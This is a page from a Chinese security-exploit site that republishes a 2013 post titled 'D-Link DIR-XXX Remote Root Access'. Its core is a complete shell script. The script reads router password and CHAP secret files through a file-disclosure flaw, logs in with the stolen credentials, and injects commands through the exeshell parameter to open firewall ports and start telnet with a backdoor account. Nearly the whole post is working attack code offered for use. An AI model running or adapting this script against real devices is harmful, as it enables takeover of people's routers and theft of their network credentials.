首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DIR-XXX Remote Root Access
来源:http://www.inbox.com/marineaquarium 作者:AKAT-1 发布时间:2013-12-05  
General info:
=============
A lot have been already said about SOHO routers. Thus, without further ado another nail in the coffin.

knock knock
===========
-- cut
#!/bin/sh


if [ -z "$1" ]; then
        echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
        echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
        echo "usage: ___FCKpd___0 [router address] [telnet port]";
        exit 0;
fi;

if [ -z "$2" ]; then
        TPORT=3333;
else
        TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 ...";

HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
        L=`echo $HTTPASSWD | cut -d' ' -f1`;
        P=`echo $HTTPASSWD | cut -d' ' -f2`;

        echo "found username: $L";
        echo "found password: $P";


        curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php" | grep -v "fail" 1>/dev/null;

        if [ $? -eq 0 ]; then
                curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
                curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
                curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;

                echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
                curl -sS "http://$1/logout.php" 1>/dev/null;
        fi
fi

CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets" | grep -A1 "<center>" | sed -e "s/<center>//g"`;

if [ ! -z "$CHAP" ]; then
        echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;

-- cut

Credits:
========
echo $use_the_source_luke

____________________________________________________________
FREE 3D MARINE AQUARIUM SCREENSAVER - Watch dolphins, sharks & orcas on your desktop!
Check it out at http://www.inbox.com/marineaquarium


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TP-Link 150M Wireless Lite N R
·OpenSSL Denial Of Service
·Firefox FBTest 1.12b4 Command
·Kaseya uploadImage Arbitrary F
·Windows NDPROXY Local SYSTEM P
·Joomla Hotornot2 Shell Upload
·Steinberg MyMp3PRO v5.0 DEP By
·Steinberg MyMp3PRO 5.0 - Buffe
·Steinberg MyMp3PRO v5.0 SEH Bu
·D-Link DSR Router Remote Root
·Steinberg MyMp3PRO v5.0 Buffer
·Eaton Network Shutdown Module
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved